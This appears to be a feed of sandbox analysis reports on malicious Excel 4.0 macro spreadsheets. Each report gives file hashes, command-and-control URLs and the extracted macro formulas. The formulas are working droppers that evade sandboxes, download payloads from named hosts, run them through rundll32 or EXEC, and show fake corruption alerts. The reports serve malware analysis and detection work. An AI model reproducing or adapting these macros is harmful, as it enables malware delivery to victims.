{"version":"0.2","sample":{"sample":"","kind":"file","target":"378bbb24f99fa196f7de8ce3d93d722b3b537df3ae472807b9e544c93e501e5e"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"378bbb24f99fa196f7de8ce3d93d722b3b537df3ae472807b9e544c93e501e5e","filesize":206336,"md5":"d8392eaa5384887e9265ae9820a654e6","sha1":"8b2380d805f05f165261bbf2a4dd883e96dc21e1","sha256":"378bbb24f99fa196f7de8ce3d93d722b3b537df3ae472807b9e544c93e501e5e","sha512":"c9cb359e455e9d5b8d49f9bdfa6795b923f60ca450958913c7764299f861e58fc56a1320b3f0f3fd4b5e3aae2543b3005b1a7b7b13b354c89ec27ea00d5bb9e3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"378bbb24f99fa196f7de8ce3d93d722b3b537df3ae472807b9e544c93e501e5e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1i1U7i63iP\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"37c69594e4ab3253448905242bbc4cb4c77b475391f5c961b83f3baf8cd6ce4e"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"37c69594e4ab3253448905242bbc4cb4c77b475391f5c961b83f3baf8cd6ce4e","filesize":185344,"md5":"00757a044997091d2caa7e5cab0cdcf3","sha1":"31d0e821e4b794eb4900bf0f2faf126565bf4d32","sha256":"37c69594e4ab3253448905242bbc4cb4c77b475391f5c961b83f3baf8cd6ce4e","sha512":"4d26a650dc9caf821f975e2f10ef062950c7aadcd66d53f16493235bc883e2012a708b8e6bdd42f3ce3fd2bdc20b0ee78acd643b59367671d3a8ae278bcd2850","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"37c69594e4ab3253448905242bbc4cb4c77b475391f5c961b83f3baf8cd6ce4e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"37cff5875e1ba3cd282e0f7b6d2dd15d67a0b9c6c0f185fb522abb7feae12217"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"37cff5875e1ba3cd282e0f7b6d2dd15d67a0b9c6c0f185fb522abb7feae12217","filesize":141824,"md5":"4478972c4f2ec01ca0525d677edec70a","sha1":"701a1778caa9c28b6afaaed1dbe482b04d50cd84","sha256":"37cff5875e1ba3cd282e0f7b6d2dd15d67a0b9c6c0f185fb522abb7feae12217","sha512":"2166701c3ae7c255984a8816eeed075b0ed815838d1e74a9e6616f037b44ebc22fe3aeeae6b4ffa2545e2cd145cbc8daaede729735a78502d91695fafdbdfc35","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"37cff5875e1ba3cd282e0f7b6d2dd15d67a0b9c6c0f185fb522abb7feae12217.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://orruucsl.xyz/fdgareg34g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"uTOsV2z1Bz\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"37dfbbade72aafb06d737e920d920fbb92f629e0faa00d2b1d4deffc19d7efca"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"37dfbbade72aafb06d737e920d920fbb92f629e0faa00d2b1d4deffc19d7efca","filesize":113664,"md5":"c8a5b71b2d4b01d60e1030c63c5eed8f","sha1":"2a65725f2201c29b2f2a7f01452b5fe292b10ace","sha256":"37dfbbade72aafb06d737e920d920fbb92f629e0faa00d2b1d4deffc19d7efca","sha512":"a9ea1a06293bd12d237764b5f46bcf523b556ce2fe0429c424fd5c4adfd8855c1ca2a384492cb3f68d4e8f37e5ea2d92f2e2023d812da28b7a14509c270cc4d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"37dfbbade72aafb06d737e920d920fbb92f629e0faa00d2b1d4deffc19d7efca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"r8NHzupIae\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"37fbb469c5f7533f36e10f68ce45681d564dc6245ab010a7d57e18dcb3d4023a"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"37fbb469c5f7533f36e10f68ce45681d564dc6245ab010a7d57e18dcb3d4023a","filesize":219136,"md5":"fefa12eef840d33b2ef0e2d7fda878fe","sha1":"2dcbcc247b0102f68cd8a8299b1762d921d87198","sha256":"37fbb469c5f7533f36e10f68ce45681d564dc6245ab010a7d57e18dcb3d4023a","sha512":"2f58d4718242b2db539cd7c1ae48c479bb87d466702404e7b914dcb06d60a22ee1fd975a180efbb8e1569d4d983852a35c6298ef32ffe7b53db3a1cea1677ffb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"37fbb469c5f7533f36e10f68ce45681d564dc6245ab010a7d57e18dcb3d4023a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://kacper-formela.pl/wp-smart.php","http://braeswoodfarmersmarket.com/wp-smart.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://kacper-formela.pl/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://braeswoodfarmersmarket.com/wp-smart.php\",\"c:\\Users\\Public\\bqg85ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bqg85ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"P5ubKWdCv5\",TRUE)\nGOTO(R$1C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"380039526e220cb961e6c37da4611958d8f778d993c4beb8a751a954c29ee11f"},"analysis":{"reported":"2020-04-09T16:15:45Z","score":10},"files":[{"filename":"380039526e220cb961e6c37da4611958d8f778d993c4beb8a751a954c29ee11f","filesize":209920,"md5":"5bb9f8f16087c277bb0f9fc08c09a7da","sha1":"1132df2b02f8c856ee1a22c80d1d4ff9412e4acf","sha256":"380039526e220cb961e6c37da4611958d8f778d993c4beb8a751a954c29ee11f","sha512":"d17bcb41649066de36747178acbb6e8ce5457278f313743fe59cda03d93867e4858e399dde786b223704d2b88331b7f49c60f1ff39cd3dec6d1e50258ed75587","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"380039526e220cb961e6c37da4611958d8f778d993c4beb8a751a954c29ee11f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UE30aEmq9g\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"384fcc7d10abc058b0c4e6d4f5982910f1cb0fd412272f7d99ba3aa7776d22ca"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"384fcc7d10abc058b0c4e6d4f5982910f1cb0fd412272f7d99ba3aa7776d22ca","filesize":141312,"md5":"d9d869445d9986176199c24e05945735","sha1":"db42586d4d00f4f21af8cca29282f4f9ebe98afa","sha256":"384fcc7d10abc058b0c4e6d4f5982910f1cb0fd412272f7d99ba3aa7776d22ca","sha512":"0dbeaea333259bc95942832c4e89eef94a5d0109da256af76e38fe8392cd81ba925edc8a5a778eaba7f3760fe33feebb6f3fa69f88f68a998626f19d53e85006","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"384fcc7d10abc058b0c4e6d4f5982910f1cb0fd412272f7d99ba3aa7776d22ca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"aYPBcZh6bk\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3871a65c21b33b548cfebdaf10a362d24904de0b2bf523ba3622115ba9a179ed"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"3871a65c21b33b548cfebdaf10a362d24904de0b2bf523ba3622115ba9a179ed","filesize":212992,"md5":"816225606aebdc717b977088c9b683b1","sha1":"bd84e4643e0188c6cf7b734b41c5e9a20b78ed25","sha256":"3871a65c21b33b548cfebdaf10a362d24904de0b2bf523ba3622115ba9a179ed","sha512":"5a98da218be72bd6176b8064daea38a4cde5fd5aca9b45fc9c028e2e24c5991b051e6896bbbdb01b0e43c2c982a3a480cc2562a9db51ed7035a6bd0eab543109","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3871a65c21b33b548cfebdaf10a362d24904de0b2bf523ba3622115ba9a179ed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gzrZq7fmwc\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"387355aef32f4a475e4e1af2a97085812585b615971551c1d4cb2923c7238eb8"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"387355aef32f4a475e4e1af2a97085812585b615971551c1d4cb2923c7238eb8","filesize":104448,"md5":"628645c506ad506dcbfa34e588645a32","sha1":"11ac2ba62eba4b896c718de714b58524790049e9","sha256":"387355aef32f4a475e4e1af2a97085812585b615971551c1d4cb2923c7238eb8","sha512":"3eda646585e36eb6453de43d6cbfab20c246c84df66d09b2bbb21cf46d070529d873bd2783d33f3200cd5218b354689cc75862a99f2d30dafee33770939b56a6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"387355aef32f4a475e4e1af2a97085812585b615971551c1d4cb2923c7238eb8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"rznuhx0cRY\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"38792b7d7e2847b529b90f9fc70e64930b235c5ca7c31f5f0ebe07721d29e70b"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"38792b7d7e2847b529b90f9fc70e64930b235c5ca7c31f5f0ebe07721d29e70b","filesize":145920,"md5":"eff76962bcb52b8c559c679abfd91a04","sha1":"373a8a167eabb98720606a3fe7a002230a9c89cc","sha256":"38792b7d7e2847b529b90f9fc70e64930b235c5ca7c31f5f0ebe07721d29e70b","sha512":"09a2d22b6e3f28c005f868bd0895af09a19c7e43bc9e52c0c4da7f8b8f1ea044de7f93de59c5f6e0f1a094969ff4b74eee53717017e41a50f7c7261c2b52f973","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"38792b7d7e2847b529b90f9fc70e64930b235c5ca7c31f5f0ebe07721d29e70b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"LTyURtIBPA\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"389b3c57a576c93c89c53cee8b03948e7e56959975a732ff63884a4da32df225"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"389b3c57a576c93c89c53cee8b03948e7e56959975a732ff63884a4da32df225","filesize":112640,"md5":"764d51dbd3dc23d8ef0ae15e78c806da","sha1":"52b515193c60456938b36e03b22a5d39eb4f904d","sha256":"389b3c57a576c93c89c53cee8b03948e7e56959975a732ff63884a4da32df225","sha512":"86881bb5253e59b7ea43405b985ede73c9b461e0cfb1bce83c76a7dde22ae0bfadabbd1f4fedcd1396d376153b3bda1273023d352139f0b86ee1f9093c9ed6a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"389b3c57a576c93c89c53cee8b03948e7e56959975a732ff63884a4da32df225.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"38a3be5b8cd7dccfd060f0fb9b6871519829877bb25a19df503d66e58282d7c3"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"38a3be5b8cd7dccfd060f0fb9b6871519829877bb25a19df503d66e58282d7c3","filesize":206336,"md5":"c115120f9328dd748912e2f50794d869","sha1":"a7a8b74ebcff6432f0981940b51b3b7ecb0f7012","sha256":"38a3be5b8cd7dccfd060f0fb9b6871519829877bb25a19df503d66e58282d7c3","sha512":"7de509f67a78c9ea95915efdefb594070e8b5a8ceabbe007a578cdcfc26feb9d624bc693fd57d96edf48389b41678cf9a72b6c6bbb3816e33d437b1ce2c15c5d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"38a3be5b8cd7dccfd060f0fb9b6871519829877bb25a19df503d66e58282d7c3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"T0ZVtBk0mT\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"38b6637c82246df63eb8312f425704979c3eab1977d668d9bbeaa67242e8d56f"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"38b6637c82246df63eb8312f425704979c3eab1977d668d9bbeaa67242e8d56f","filesize":142848,"md5":"3fd20ca71fa3fe515348a022f90fa851","sha1":"57a38fae296ef249d367adbe8ec009eb48872918","sha256":"38b6637c82246df63eb8312f425704979c3eab1977d668d9bbeaa67242e8d56f","sha512":"7359baa924d9262aafe4d3f044291789dac39639f19064791c375bf9b8444be6ca498fc502e874d00f7289641a80856ab008150aa5bde7b1ddd3f71af3ffeaea","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"38b6637c82246df63eb8312f425704979c3eab1977d668d9bbeaa67242e8d56f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"2YYCjM2epD\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"38c4d819049c2645c80cc216c1ef2e05ceea90ff7df258454186f743edcdf5bd"},"analysis":{"reported":"2020-04-09T16:15:46Z","score":10},"files":[{"filename":"38c4d819049c2645c80cc216c1ef2e05ceea90ff7df258454186f743edcdf5bd","filesize":168448,"md5":"50ff8c40fe276b9a68616bf8e57fd722","sha1":"90f7a06b0a84efea39b797e9b7889203470fa5da","sha256":"38c4d819049c2645c80cc216c1ef2e05ceea90ff7df258454186f743edcdf5bd","sha512":"ebc5e1908f4bd8d448efe8ad5c06902e78e177ddc22d2f7cd04c4d478321290cd765992e61368ad1dd1de70e38ff5b15fd412f7ea008f1034e3371ceaa11a804","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"38c4d819049c2645c80cc216c1ef2e05ceea90ff7df258454186f743edcdf5bd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"upYGFwPdI0\",TRUE)\nGOTO(R$0C$11)"}}}]}
